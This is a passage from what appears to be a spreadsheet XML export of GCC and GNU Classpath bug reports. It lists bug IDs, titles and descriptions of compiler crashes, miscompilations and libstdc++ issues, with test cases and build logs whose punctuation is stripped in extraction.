manual it occurred to me to wonder if it was valid to longjmp back up
out of such a noreturn function to some higher point in the program.
It'd be nice if that could be stated.
It doesn't particularly worry me whether a longjmp is allowed or not
or might be allowed in the future or whatever I just thought the
manual could try to say something to stop anyone wondering or making
wrong assumptions.
Environment:
System: Linux blah 2.2.15 #1 Tue Apr 25 17:13:48 EST 2000 i586 unknown unknown GNU/Linux
Architecture: i586
host: i486-pc-linux-gnu
build: i486-pc-linux-gnu
target: i486-pc-linux-gnu
configured with: ../src/configure -v --enable-languages=cc++javaf77pascalobjcadatreelang --prefix=/usr --mandir=/usr/share/man --infodir=/usr/share/info --with-gxx-include-dir=/usr/include/c++/3.3 --enable-shared --with-system-zlib --enable-nls --without-included-gettext --enable-__cxa_atexit --enable-clocale=gnu --enable-debug --enable-java-gc=boehm --enable-java-awt=xlib --enable-objc-gc i486-linux
How-To-Repeat:
.</t>
  </si>
  <si>
    <t>GCC-5579</t>
  </si>
  <si>
    <t>Problems with money_get</t>
  </si>
  <si>
    <t>According to Table 14.15 on page 714 from the book The C++ Standard
Library by Josuttis when pattern is set to { symbol none sign
value } $1234.54 should be legal input. But the following test case tmon
does not work. I apologize if I made a mistake.
Release:
3.1 20020202 (experimental)
Environment:
System: Linux kiste 2.4.17 #7 Thu Jan 3 17:21:51 CET 2002 i686 unknown
Architecture: i686
Glibc 2.2.4 + patches
Linux 2.4.17
binutils 2.11.92.0.12.3
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ../gcc/configure --enable-shared --disable-nls --enable-threads --enable-languages=cc++f77objc
How-To-Repeat:
Source code tmon.C
#include 
#include 
#include 
class My_money_io : public std::moneypunct
{
public:
  explicit My_money_io(size_t r = 0): std::moneypunct(r) { }
  char_type do_decimal_point() const { return '.' }
  char_type do_thousand_sep() const { return '' }
  std::string do_grouping() const { return \003\003\003 }
  std::string do_curr_symbol() const { return $ }
  std::string do_positive_sign() const { return  }
  std::string do_negative_sign() const { return - }
  int do_frac_digits() const { return 2 }
  pattern do_pos_format() const
  {
    static pattern pat = { { symbol none sign value } }
    return pat
  }
  pattern do_neg_format() const
  {
    static pattern pat = { { symbol none sign value } }
    return pat
  }
}
int main ()
{
  using namespace std
  typedef istreambuf_iterator InIt
  locale loc(locale::classic() new My_money_io)
  string buffer($1234.56)
  bool intl = false
  InIt iend
  ios_base::iostate err = ios::goodbit
  string val
  long double lval
  cerr &lt;&lt; good eof fail bad 
       &lt;&lt; ios::goodbit &lt;&lt;  
       &lt;&lt; ios::eofbit &lt;&lt;  
       &lt;&lt; ios::failbit &lt;&lt;  
       &lt;&lt; ios::badbit &lt;&lt; endl
  const money_get&amp; mg  =
    use_facet &gt;(loc)
  {
    istringstream fmt(buffer)
    InIt ibeg(fmt)
    mg.get(ibegiendintlfmterrval)
    cerr &lt;&lt; iostates: &lt;&lt; err &lt;&lt; '\n' 
  }
  {
    istringstream fmt(buffer)
    InIt ibeg(fmt)
    mg.get(ibegiendintlfmterrlval)
    cerr &lt;&lt; iostatel: &lt;&lt; err &lt;&lt; '\n' 
  }
  cout &lt;&lt; buffer: &lt;&lt; buffer &lt;&lt;  val: &lt;&lt; val  
       &lt;&lt;  lval: &lt;&lt; lval &lt;&lt; endl
}
g++ -v -o tmon tmon.C -W -Wall
Reading specs from /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.1/specs
Configured with: ../gcc/configure --enable-shared --disable-nls --enable-threads --enable-languages=cc++f77objc
Thread model: posix
gcc version 3.1 20020202 (experimental)
 /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.1/cc1plus -v -D__GNUC__=3 -D__GNUC_MINOR__=1 -D__GNUC_PATCHLEVEL__=0 -D__ELF__ -Dunix -Dlinux -D__ELF__ -D__unix__ -D__linux__ -D__unix -D__linux -Asystem=posix -D__NO_INLINE__ -D__STDC_HOSTED__=1 -D_GNU_SOURCE -Acpu=i386 -Amachine=i386 -Di386 -D__i386 -D__i386__ -D__tune_i686__ -D__tune_pentiumpro__ tmon.C -D__GNUG__=3 -D__DEPRECATED -D__EXCEPTIONS -D__GXX_ABI_VERSION=100 -quiet -dumpbase tmon.C -W -Wall -version -o /tmp/ccGMffsb.s
GNU CPP version 3.1 20020202 (experimental) (cpplib) (i386 Linux/ELF)
GNU C++ version 3.1 20020202 (experimental) (i686-pc-linux-gnu)
	compiled by GNU C version 3.1 20020202 (experimental).
ignoring nonexistent directory NONE/include
ignoring nonexistent directory /usr/local/i686-pc-linux-gnu/include
#include ... search starts here:
#include  search starts here:
 /usr/local/include/g++-v3
 /usr/local/include/g++-v3/i686-pc-linux-gnu
 /usr/local/include/g++-v3/backward
 /usr/local/include
 /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.1/include
 /usr/include
End of search list.
 /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.1/../../../../i686-pc-linux-gnu/bin/as -V -Qy -o /tmp/ccH1OGSt.o /tmp/ccGMffsb.s
GNU assembler version 2.11.92.0.12.3 (i686-pc-linux-gnu) using BFD version 2.11.92.0.12.3 20011121
./tmon
good eof fail bad 0 2 4 1
iostates:4
iostatel:4
buffer:$1234.56 val: lval:-5.73401e-247</t>
  </si>
  <si>
    <t>GCC-13477</t>
  </si>
  <si>
    <t>Bootstrap failure: gcc/gcc/combine.c:10294: warning: 'mask' might be used uninitialized in this function</t>
  </si>
  <si>
    <t>I can't bootstrap tree-ssa branch CVS gcc at FeeBSD 5.1:
using both system compiler gcc (GCC) 3.2.2 [FreeBSD] 20030205 (release)
and mainline CVS gcc
using both binutils version 2.13.2 [FreeBSD] 2002-11-27
and mainline CVS binutils.
Last time when i can bootstrap tree-ssa breanch GCC is 2003.12.11
Bootstrap error messages:
---8X----------------------------------------
stage1/xgcc -Bstage1/ -B/home/wanderer/pkg/gcc/i386-unknown-freebsd5.1/bin/ -
c   -g -O2  -DIN_GCC   -W -Wall -Wwrite-strings -Wstrict-prototypes -Wmissing-
prototypes -pedantic -Wno-long-long -Wold-style-definition -Werror -fno-
common   -DHAVE_CONFIG_H    -I. -I. -
I/home/wanderer/pkg/build/gcc/src/gcc_ssa/gcc/gcc -
I/home/wanderer/pkg/build/gcc/src/gcc_ssa/gcc/gcc/. -
I/home/wanderer/pkg/build/gcc/src/gcc_ssa/gcc/gcc/../include -I../intl -
I/home/wanderer/pkg/build/gcc/src/gcc_ssa/gcc/gcc/../libbanshee/libcompat -
I/home/wanderer/pkg/build/gcc/src/gcc_ssa/gcc/gcc/../libbanshee -
I/home/wanderer/pkg/build/gcc/src/gcc_ssa/gcc/gcc/../libbanshee/points-
to  /home/wanderer/pkg/build/gcc/src/gcc_ssa/gcc/gcc/combine.c -o combine.o
/home/wanderer/pkg/build/gcc/src/gcc_ssa/gcc/gcc/combine.c: In function 
`simplify_comparison':
/home/wanderer/pkg/build/gcc/src/gcc_ssa/gcc/gcc/combine.c:10294: 
warning: 'mask' might be used uninitialized in this function
gmake[2]: *** [combine.o] ÐžÑˆÐ¸Ð±ÐºÐ° 1
gmake[2]: Leaving directory `/usr/home/wanderer/pkg/build/gcc/gcc'
gmake[1]: *** [stage2_build] ÐžÑˆÐ¸Ð±ÐºÐ° 2
gmake[1]: Leaving directory `/usr/home/wanderer/pkg/build/gcc/gcc'
gmake: *** [bootstrap] ÐžÑˆÐ¸Ð±ÐºÐ° 2
---X8---------------------------</t>
  </si>
  <si>
    <t>GCC-12359</t>
  </si>
  <si>
    <t>template specialization broken when typeof(var) used with template class</t>
  </si>
  <si>
    <t>#include 
// Bug in  GCC 3.3.1 (tested with MinGW)
// also in GCC 3.2.3 (tested with MinGW)
// template specialization lookup is broken when typeof(var) is
// provided as a template argument within a template class.
template  struct trait { typedef void return_t }
template  struct trait      { typedef char return_t }
template  struct trait     { typedef float return_t }
int my_int
template  struct working
{
   inline typename ::trait::return_t foo()  
   {
      return 'a'
   }
}
struct working_also
{
   inline ::trait::return_t foo()
   {
      return 'b'
   }
}
template  struct broken
{
   inline typename ::trait::return_t foo() // yields wrong 
specialization of ::trait
   {
      typeof(my_int) val = 3
      return 'c'
   }
}
int main()
{
   working a
   working_also b
   broken  c
   // Should output abc but c.foo() incorrectly returns void
   std::cout &lt;&lt; a.foo() &lt;&lt; b.foo() &lt;&lt; c.foo()
   return 0
}</t>
  </si>
  <si>
    <t>mbartosik</t>
  </si>
  <si>
    <t>GCC-79640</t>
  </si>
  <si>
    <t>[5/6 Regression] ICE with generic lambda expression</t>
  </si>
  <si>
    <t>The following valid code snippet triggers an ICE since GCC 5.1.0:
=======================================
template void foo(F f)
{
  f(1)
}
template void bar()
{
  const int i = i
  foo([] (auto) { sizeof(i) })
}
void baz() { bar() }
=======================================
g++: internal compiler error: Segmentation fault (program cc1plus)
Please submit a full bug report [etc.]</t>
  </si>
  <si>
    <t>GCC-78890</t>
  </si>
  <si>
    <t>[6 Regression] ICE on invalid reference type in union</t>
  </si>
  <si>
    <t>Reddit user sjd96 reported the following issue:
 % cat union.ii
int main() {
  union {
    int a
    int 
  }
  a = 1
  auto c = b + 1
}
 % g++ -c union.ii
union.ii: In function â€˜int main()â€™:
union.ii:1:5: error: invalid first operand of MEM_REF
 int main() {
     ^~~~
_2
union.ii:7:12: note: in statement
   auto c = b + 1
            ^
_3 = MEM[(int 
union.ii:1:5: internal compiler error: verify_gimple failed
 int main() {
     ^~~~
0xda2bd5 verify_gimple_in_cfg(function* bool)
        /home/markus/gcc/gcc/tree-cfg.c:5266
0xc85c06 execute_function_todo
        /home/markus/gcc/gcc/passes.c:1965
0xc86cab execute_todo
        /home/markus/gcc/gcc/passes.c:2015
 % g++ -std=c++98 -c union.ii
union.ii: In function â€˜int main()â€™:
union.ii:4:14: warning: non-static data member initializers only available with -std=c++11 or -std=gnu++11
     int 
              ^
union.ii:4:14: error: in C++98 â€˜main()::::bâ€™ may not have reference type â€˜int&amp;â€™ because it is a member of a union
union.ii:7:8: error: â€˜câ€™ does not name a type
   auto c = b + 1
        ^</t>
  </si>
  <si>
    <t>GCC-44069</t>
  </si>
  <si>
    <t>[4.5 Regression] optimization bug initializing from cast array</t>
  </si>
  <si>
    <t>The code below when compiled with out optimization produces the expected result:
% g++ bug.cc -o bug
% ./bug
{1 2 3 4}
{5 6 7 8}
{9 0 1 2}
{3 4 5 6}
When compiled with optimization it produces garbage for all rows of the matrix except the first row:
% g++ -O2 bug.cc -o bug
% ./bug
{1 2 3 4}
{3.11042e-317 2.07381e-317 4.94066e-323 2.07372e-317}
{0 2.07321e-317 6.92543e-310 2.07375e-317}
{6.92543e-310 2.07372e-317 0 2.0733e-317}
bug.cc:
#include 
template 
class M {
  public:
    M( const double* arr ) {
      for (unsigned r = 0 r &lt; R ++r)
        for (unsigned c = 0 c &lt; C ++c)
          m[r*C+c] = arr[r*C+c]
    }
    double operator()(unsigned r unsigned c) const
      { return m[r*C+c] }
  private:
    double m[R*C]
}
template 
std::ostream&amp; operator&amp; m )
{
  for (unsigned r = 0 r &lt; R ++r) {
    str &lt;&lt; { &lt;&lt; m(r0)
    for (unsigned c = 1 c &lt; C ++c)
      str &lt;&lt;   &lt;&lt; m(rc)
    str &lt;&lt; } &lt;&lt; std::endl
  }
  return str
}
int main()
{
  double vals[4][4] = { { 1 2 3 4 }
                        { 5 6 7 8 }
                        { 9 0 1 2 }
                        { 3 4 5 6 } }
  M m( 
  std::cout &lt;&lt; m &lt;&lt; std::endl
  return 0
}</t>
  </si>
  <si>
    <t>kraftche</t>
  </si>
  <si>
    <t>GCC-21209</t>
  </si>
  <si>
    <t>signed integer overflow in num_get::_M_extract_int</t>
  </si>
  <si>
    <t>__new_result definitely overflows and this is *bad* (at least in principle )
when it's signed. I have a patch in testing which has small (probably bearable)
performance implications.</t>
  </si>
  <si>
    <t>GCC-2190</t>
  </si>
  <si>
    <t xml:space="preserve">abs(long) div(longlong) defined in  instead of </t>
  </si>
  <si>
    <t>libstdc++ defines the long versions of abs and div in cmath rather
than in cstdlib as clause 26.5 of the standard seems to require.
This causes the program below to be rejected with ambiguity
errors if the compiler is configured with --enable-long-long.
Release:
3.0 20010305 (prerelease)
Environment:
System: Linux karma 2.2.16-22 #1 Tue Aug 22 16:49:06 EDT 2000 i686 unknown
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ../egcs/configure --prefix=/usr/local/egcs --enable-threads=posix --enable-long-long
How-To-Repeat:
Configure the compiler with --enable-long-long.
Then compiling this source
--------------------------------------------
#include 
int  main()
{
  long a = std::abs (1L)
  ldiv_t b = std::div (2L 1L)
}
--------------------------------------------
gives the errors
$ g++ -c x.cc
x.cc: In function `int main()':
x.cc:5: call of overloaded `abs(long int)' is ambiguous
/usr/local/egcs/include/g++-v3/bits/std_cstdlib.h:123: candidates are: int 
   std::abs(int)
/usr/local/egcs/include/g++-v3/bits/std_cstdlib.h:135:                 long 
   long int std::abs(long long int)
x.cc:6: call of overloaded `div(long int long int)' is ambiguous
/usr/local/egcs/include/g++-v3/bits/std_cstdlib.h:125: candidates are: div_t 
   std::div(int int)
/usr/local/egcs/include/g++-v3/bits/std_cstdlib.h:142:                 lldiv_t 
   std::div(long long int long long int)</t>
  </si>
  <si>
    <t>GCC-70205</t>
  </si>
  <si>
    <t>[5 Regression] ICE on valid code on x86_64-linux-gnu: tree check: expected tree_binfo have error_mark in add_candidates at cp/call.c:5283</t>
  </si>
  <si>
    <t>The following valid code causes an ICE when compiled with the current GCC trunk on x86_64-linux-gnu in both 32-bit and 64-bit modes. 
This is a regression from 5.3.x. 
$ g++-trunk -v
Using built-in specs.
COLLECT_GCC=g++-trunk
COLLECT_LTO_WRAPPER=/usr/local/gcc-trunk/libexec/gcc/x86_64-pc-linux-gnu/6.0.0/lto-wrapper
Target: x86_64-pc-linux-gnu
Configured with: ../gcc-source-trunk/configure --enable-languages=cc++lto --prefix=/usr/local/gcc-trunk --disable-bootstrap
Thread model: posix
gcc version 6.0.0 20160311 (experimental) [trunk revision 234134] (GCC) 
$ 
$ g++-5.3 -c small.cpp
$ 
$ g++-trunk -c small.cpp
small.cpp: In member function â€˜void D::g()â€™:
small.cpp:19:11: internal compiler error: tree check: expected tree_binfo have error_mark in add_candidates at cp/call.c:5283
     D::f ()
           ^
0xfe10bc tree_check_failed(tree_node const* char const* int char const* ...)
	../../gcc-source-trunk/gcc/tree.c:9643
0x61c634 tree_check
	../../gcc-source-trunk/gcc/tree.h:3006
0x61c634 add_candidates
	../../gcc-source-trunk/gcc/cp/call.c:5283
0x61ccf6 build_new_method_call_1
	../../gcc-source-trunk/gcc/cp/call.c:8284
0x61ccf6 build_new_method_call(tree_node* tree_node* vec** tree_node* int tree_node** int)
	../../gcc-source-trunk/gcc/cp/call.c:8480
0x7bbddc finish_call_expr(tree_node* vec** bool bool int)
	../../gcc-source-trunk/gcc/cp/semantics.c:2410
0x735a49 cp_parser_postfix_expression
	../../gcc-source-trunk/gcc/cp/parser.c:6904
0x73edbc cp_parser_unary_expression
	../../gcc-source-trunk/gcc/cp/parser.c:7988
0x73f617 cp_parser_cast_expression
	../../gcc-source-trunk/gcc/cp/parser.c:8665
0x73fc15 cp_parser_binary_expression
	../../gcc-source-trunk/gcc/cp/parser.c:8767
0x740500 cp_parser_assignment_expression
	../../gcc-source-trunk/gcc/cp/parser.c:9055
0x742dd9 cp_parser_expression
	../../gcc-source-trunk/gcc/cp/parser.c:9222
0x74354f cp_parser_expression_statement
	../../gcc-source-trunk/gcc/cp/parser.c:10683
0x73129b cp_parser_statement
	../../gcc-source-trunk/gcc/cp/parser.c:10534
0x731f4c cp_parser_statement_seq_opt
	../../gcc-source-trunk/gcc/cp/parser.c:10806
0x73203f cp_parser_compound_statement
	../../gcc-source-trunk/gcc/cp/parser.c:10760
0x75087f cp_parser_function_body
	../../gcc-source-trunk/gcc/cp/parser.c:20639
0x75087f cp_parser_ctor_initializer_opt_and_function_body
	../../gcc-source-trunk/gcc/cp/parser.c:20675
0x751321 cp_parser_function_definition_after_declarator
	../../gcc-source-trunk/gcc/cp/parser.c:25337
0x756750 cp_parser_late_parsing_for_member
	../../gcc-source-trunk/gcc/cp/parser.c:26177
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
$ 
-----------------------------------
class A
{
protected:
  static void f ()
}
class B : public A
{
}
class C : public A
{
}
class D : public C public B
{
  void g ()
  {
    D::f ()
  }
}</t>
  </si>
  <si>
    <t>GCC-83518</t>
  </si>
  <si>
    <t>[8/9 Regression] Missing optimization: useless instructions should be dropped</t>
  </si>
  <si>
    <t>gcc (trunk) with '-O3 -std=c++17' for this code:
unsigned test()
{
    int arr[] = {54321}
    int sum = 0
    for(int i = 0i &lt; 5++i)
    {
        for(int j = 0 j &lt; 5 ++j)
        {
            int t = arr[i]
            arr[i] = arr[j]
            arr[j] = t
        }
    }
    for(int i = 0 i &lt; 5 ++i)
    {
        sum += arr[i]
    }
    return sum
}
generates it:
test():
  movdqa xmm0 XMMWORD PTR .LC0[rip]
  movaps XMMWORD PTR [rsp-40] xmm0
  mov rax QWORD PTR [rsp-32]
  mov DWORD PTR [rsp-32] 1
  mov QWORD PTR [rsp-40] rax
  mov DWORD PTR [rsp-28] 5
  movdqa xmm0 XMMWORD PTR [rsp-40]
  movdqa xmm1 xmm0
  psrldq xmm1 8
  paddd xmm0 xmm1
  movdqa xmm1 xmm0
  psrldq xmm1 4
  paddd xmm0 xmm1
  movd eax xmm0
  add eax 4
  ret
.LC0:
  .long 5
  .long 4
  .long 3
  .long 2
clang (trunk) with '-O3 -std=c++17':
test(): # @test()
  mov eax 15
  ret</t>
  </si>
  <si>
    <t>zamazan4ik</t>
  </si>
  <si>
    <t>GCC-45807</t>
  </si>
  <si>
    <t>Lying eh_frame r2 save info causes crashes with static libgcc_eh and libstdc++</t>
  </si>
  <si>
    <t xml:space="preserve">Created attachment 21893
testcase from Allan Pratt 
In the eh_frame description for _Unwind_Resume_or_Rethrow I see
000012a0 0000007c 000012a4 FDE cie=00000000 pc=100712c0..100714f8
  DW_CFA_advance_loc: 4 to 100712c4
  DW_CFA_def_cfa_offset: 3216
  DW_CFA_advance_loc: 164 to 10071368
  DW_CFA_offset_extended_sf: r2 at cfa+40
[snip]
but r2 is not saved by this function at least not before
_Unwind_RaiseException is called.  So the lie that r2 is saved at
cfa+40 once we are past 10071368 can cause the unwinder to return a bad
value for r2 when unwinding through _Unwind_Resume_or_Rethrow from 
_Unwind_RaiseException.  r2 won't be saved if _Unwind_Resume_of_Rethrow is called statically from the same toc group but this bug is often covered by the fact that a previous call into exception handling functions has written the correct r2 value to the stack.
00000000100712c0 :
    100712c0:   f8 21 f3 71     stdu    r1-3216(r1)
    100712c4:   7d 80 00 26     mfcr    r12
    100712c8:   7c 08 02 a6     mflr    r0
    100712cc:   d9 c1 0c 00     stfd    f143072(r1)
    100712d0:   d9 e1 0c 08     stfd    f153080(r1)
    100712d4:   f8 01 0c a0     std     r03232(r1)
    100712d8:   da 01 0c 10     stfd    f163088(r1)
    100712dc:   da 21 0c 18     stfd    f173096(r1)
    100712e0:   da 41 0c 20     stfd    f183104(r1)
    100712e4:   da 61 0c 28     stfd    f193112(r1)
    100712e8:   da 81 0c 30     stfd    f203120(r1)
    100712ec:   da a1 0c 38     stfd    f213128(r1)
    100712f0:   da c1 0c 40     stfd    f223136(r1)
    100712f4:   da e1 0c 48     stfd    f233144(r1)
    100712f8:   db 01 0c 50     stfd    f243152(r1)
    100712fc:   db 21 0c 58     stfd    f253160(r1)
    10071300:   db 41 0c 60     stfd    f263168(r1)
    10071304:   db 61 0c 68     stfd    f273176(r1)
    10071308:   db 81 0c 70     stfd    f283184(r1)
    1007130c:   db a1 0c 78     stfd    f293192(r1)
    10071310:   db c1 0c 80     stfd    f303200(r1)
    10071314:   db e1 0c 88     stfd    f313208(r1)
    10071318:   f9 c1 0b 70     std     r142928(r1)
    1007131c:   f9 e1 0b 78     std     r152936(r1)
    10071320:   fa 01 0b 80     std     r162944(r1)
    10071324:   fa 21 0b 88     std     r172952(r1)
    10071328:   fa 41 0b 90     std     r182960(r1)
    1007132c:   fa 61 0b 98     std     r192968(r1)
    10071330:   fa 81 0b a0     std     r202976(r1)
    10071334:   fa a1 0b a8     std     r212984(r1)
    10071338:   fa c1 0b b0     std     r222992(r1)
    1007133c:   fa e1 0b b8     std     r233000(r1)
    10071340:   fb 01 0b c0     std     r243008(r1)
    10071344:   fb 21 0b c8     std     r253016(r1)
    10071348:   fb 41 0b d0     std     r263024(r1)
    1007134c:   fb 61 0b d8     std     r273032(r1)
    10071350:   fb 81 0b e0     std     r283040(r1)
    10071354:   fb a1 0b e8     std     r293048(r1)
    10071358:   fb c1 0b f0     std     r303056(r1)
    1007135c:   fb e1 0b f8     std     r313064(r1)
    10071360:   e8 03 00 10     ld      r016(r3)
    10071364:   7c 7f 1b 78     mr      r31r3
    10071368:   2f a0 00 00     cmpdi   cr7r00
    1007136c:   f8 61 0b 50     std     r32896(r1)
    10071370:   f8 81 0b 58     std     r42904(r1)
    10071374:   f8 a1 0b 60     std     r52912(r1)
    10071378:   f8 c1 0b 68     std     r62920(r1)
    1007137c:   91 81 0c 98     stw     r123224(r1)
    10071380:   40 9e 00 e0     bne-    cr710071460 
    10071384:   4b ff f8 0d     bl      10070b90 </t>
  </si>
  <si>
    <t>CLASSPATH-24474</t>
  </si>
  <si>
    <t>StackOverflowError in reflexive expressions</t>
  </si>
  <si>
    <t>Hi
I found another bug in gjdoc if try to create the javadocs for eclipse which caused java.lang.StackOverflowError or a segfault for gcj.</t>
  </si>
  <si>
    <t>GCC-25612</t>
  </si>
  <si>
    <t>[4.2 Regression] Ada bootstrap failure on x86_64 find_or_generate_expression at tree-ssa-pre.c:2028</t>
  </si>
  <si>
    <t>From Andreas Jaeger confirmed by toon on IRC.
http://gcc.gnu.org/ml/gcc-patches/2005-12/msg01955.html
make[3]: Entering directory `/builds/gcc/misc/stage3-gcc/ada/tools'
../../gnatmake -c -I../rts -I. -I/cvs/gcc-svn/trunk/gcc/ada gnatchop --GCC=../../xgcc -B../../ -O2 -g -O2       -gnatpg -gnata
../../xgcc -c -I./ -I../rts -I. -I/cvs/gcc-svn/trunk/gcc/ada -B../../ -O2 -g -O2 -gnatpg -gnata -I- /cvs/gcc-svn/trunk/gcc/ada/gnatchop.adb
+===========================GNAT BUG DETECTED==============================+
| 4.2.0 20051231 (experimental) (x86_64-suse-linux-gnu) GCC error:         |
| in find_or_generate_expression at tree-ssa-pre.c:2028                   |
| Error detected at gnatchop.adb:1810:5                                    |
| Please submit a bug report see http://gcc.gnu.org/bugs.html.            |
| Use a subject line meaningful to you and us to track the bug.            |
| Include the entire contents of this bug box in the report.               |
| Include the exact gcc or gnatmake command that you entered.              |
| Also include sources listed below in gnatchop format                     |
| (concatenated together with no headers between files).                   |
+==========================================================================+</t>
  </si>
  <si>
    <t>GCC-26858</t>
  </si>
  <si>
    <t>NullPointerException not generated for large classes...</t>
  </si>
  <si>
    <t>When running on some Linux kernels the heap is mapped into memory low in the address space.  Dereferencing a null pointer for class with a lot of fields an erroneously access the heap instead of throwing a NullPointerException.</t>
  </si>
  <si>
    <t>GCC-13877</t>
  </si>
  <si>
    <t>[3.3 regression] miscompilation with -O -funroll-loops on powerpc</t>
  </si>
  <si>
    <t>[forwarded from http://bugs.debian.org/229567]
seen with 3.3 CVS 20040110 not in 3.2.3 and 3.4 CVS.
When complied with -O -funroll-loops on powerpc the attached test.i 
produces the following output: 
Bytes in main:  0 1 
Bytes in: 0 1 0 1 0 1 ( 0 10 15 254) 
x = 282 
Bytes in: 0 1 0 1 0 1 ( 94 52 15 254) 
x = 418 
Bytes in: 0 1 0 1 0 1 ( 7 208 15 254) 
x = 487 
The reported x's should be the sum of the first six numbers on the line 
above. Instead it is the sum of _all_ the numbers on the line above. 
Changing -O to -O2 or removing -funroll-loops generates the following 
(correct) result: 
Bytes in main:  0 1 
Bytes in: 0 1 0 1 0 1 ( 70 148 15 234) 
x = 3 
Bytes in: 0 1 0 1 0 1 ( 0 10 15 254) 
x = 3 
Bytes in: 0 1 0 1 0 1 ( 7 76 15 234) 
x = 3 
On 386 this problem does not occur. 
Note that this could be the same bug as PR13222 in which case this would 
be a nice small test case. I have not actually looked at the test case 
in PR13222 however since it is rather large. 
Flags used: 
  gcc -O -funroll-loops test.i</t>
  </si>
  <si>
    <t>GCC-3503</t>
  </si>
  <si>
    <t>ice on libFoundation-090 source</t>
  </si>
  <si>
    <t xml:space="preserve">	The compiler crashes on the common.m and Defaults.m file from the 
	libFoundation-090 package like this:
 make
Making all in Foundation...
make[1]: Entering directory `/tmp/libFoundation/libFoundation/Foundation'
make[2]: Entering directory `/tmp/libFoundation/libFoundation/Foundation'
gcc -fPIC -fgnu-runtime -I.. -g -O2 -Wall -DDEBUG -c common.m -o shared_obj/common.o
common.m: In function `handler':
common.m:87: Internal compiler error in make_decl_rtl at varasm.c:591
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
make[2]: *** [shared_obj/common.o] Error 1
make[2]: Leaving directory `/tmp/libFoundation/libFoundation/Foundation'
make[1]: *** [shared] Error 2
make[1]: Leaving directory `/tmp/libFoundation/libFoundation/Foundation'
Making all in Resources...
make[1]: Entering directory `/tmp/libFoundation/libFoundation/Resources'
make[1]: Nothing to be done for `all'.
make[1]: Leaving directory `/tmp/libFoundation/libFoundation/Resources'
Making all in examples...
make[1]: Entering directory `/tmp/libFoundation/libFoundation/examples'
gcc -fgnu-runtime -I.. -g -O2 -Wall -DDEBUG -c Defaults.m -o obj/Defaults.o
Defaults.m: In function `handler':
Defaults.m:137: Internal compiler error in make_decl_rtl at varasm.c:591
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
make[1]: *** [obj/Defaults.o] Error 1
make[1]: Leaving directory `/tmp/libFoundation/libFoundation/examples'
make: *** [all] Error 2
Release:
3.0
Environment:
System: Linux gloom 2.4.5 #4 Tue May 29 15:04:16 CEST 2001 i686 unknown
Architecture: i686
host: i686-freza-linux-gnu
build: i686-freza-linux-gnu
target: i686-freza-linux-gnu
configured with: ../gcc-3.0/configure --host=i686-freza-linux-gnu --enable-haifa --with-gnu-as --with-gnu-ld --enable-threads --enable-cpp --enable-languages=c++f77objc --with-dwarf2 --prefix=/usr --enable-shared
How-To-Repeat:
	I attach the preprocessed common.m source. Just do gcc file.m
Unformatted:
 --FL5UXtIhxfXey3p5
 Content-Type: text/plain charset=us-ascii
 Content-Disposition: inline</t>
  </si>
  <si>
    <t>jakym</t>
  </si>
  <si>
    <t>GCC-78561</t>
  </si>
  <si>
    <t>Constant pool size (offset) can become stale where constant pool entires become unused</t>
  </si>
  <si>
    <t>This bug report is mostly from inspection but the effects of this issue can be seen with this testcase on AArch64 (See also PR70120 for why we need the size of the constant pool to be correct).
  int
  main (__fp16 x)
  {
    __fp16 a = 6.5504e4
    return (x &lt;= a)
  }
gcc foo.c -O3 -mcmodel=tiny -g
/tmp/ccwJITmo.s: Assembler messages:
/tmp/ccwJITmo.s: Error: unaligned opcodes detected in executable segment
In this test case a call to force_const_mem in ira adds a new 32-bit constant in the constant pool but ultimately doesn't use it. That means that when we sweep patterns looking for which constant pool entries to emit we don't mark the unused pattern created by ira and it doesn't get emitted. But that leaves us with inconsistent information between the offset we think we've got and what we've actually emitted.
Presumably IRA isn't the only pass at fault here. Anything which eliminates a reference to a constant pool entry can cause the constant pool offset information to become stale as it is only updated when inserting entries to the constant pool not when we decide those entries are actually used.
Maybe force_const_mem shouldn't be updating the offset information at all and we should only update that as we make the sweep in mark_constant_pool looking for live pool entries? I guess the trouble there is that we don't record the mode of the mem in the constant_descriptor_rtx - but if we were to do that it looks like we might be able to defer calculating offset until when we actually emit the pool. rs6000 might need some changes but a better interface for their uses of get_pool_size looks like it would be pool_empty_p anyway.
I'm not sure of this code though so I don't know if that would make for a clean design.</t>
  </si>
  <si>
    <t>GCC-3684</t>
  </si>
  <si>
    <t xml:space="preserve"> Originator:	Robert Creager
 Synopsis:	Internal compiler error in change_address at emit-rtl.c:1635
 Severity:	critical
 Priority:	medium
 Category:	c
 Class:	ice-on-legal-code
 Release:	3.0
 Environment:
 System: SunOS vision 5.6 Generic_105181-17 sun4u sparc SUNWUltra-5_10
 Architecture: sun4
 host: sparc-sun-solaris2.6
 build: sparc-sun-solaris2.6
 target: sparc-sun-solaris2.6
 configured with: ../gcc-3.0/configure --prefix=/proj/twolf/local/gcc-3.0
 Description:
 % gcc -v -save-temps -c -g -O2 -Dsolaris -DHAVE_STDLIB_H=1 -DHAVE_STRING_H=1
 -DHAVE_MATH_H=1 -DHAVE_LIMITS_H=1 -DHAVE_FTRUNCATE=1 -DHAVE_SHMEM_SERVICES=1
 -DHAVE_FLOCK_T=1 -DHAVE_NET_SERVICES=1 getcolb.c
 Reading specs from
 /proj/twolf/local/gcc-3.0/lib/gcc-lib/sparc-sun-solaris2.6/3.0/specs
 Configured with: ../gcc-3.0/configure --prefix=/proj/twolf/local/gcc-3.0
 Thread model: posix
 gcc version 3.0
  /proj/twolf/local/gcc-3.0/lib/gcc-lib/sparc-sun-solaris2.6/3.0/cpp0 -lang-c
 -v -D__GNUC__=3 -D__GNUC_MINOR__=0 -D__GNUC_PATCHLEVEL__=0 -Dsparc -Dsun
 -Dunix -D__svr4__ -D__SVR4 -D__sparc__ -D__sun__ -D__unix__ -D__svr4__
 -D__SVR4 -D__sparc -D__sun -D__unix -Asystem=unix -Asystem=svr4
 -D__OPTIMIZE__ -D__STDC_HOSTED__=1 -D__GCC_NEW_VARARGS__ -Acpu=sparc
 -Amachine=sparc -Dsolaris -DHAVE_STDLIB_H=1 -DHAVE_STRING_H=1
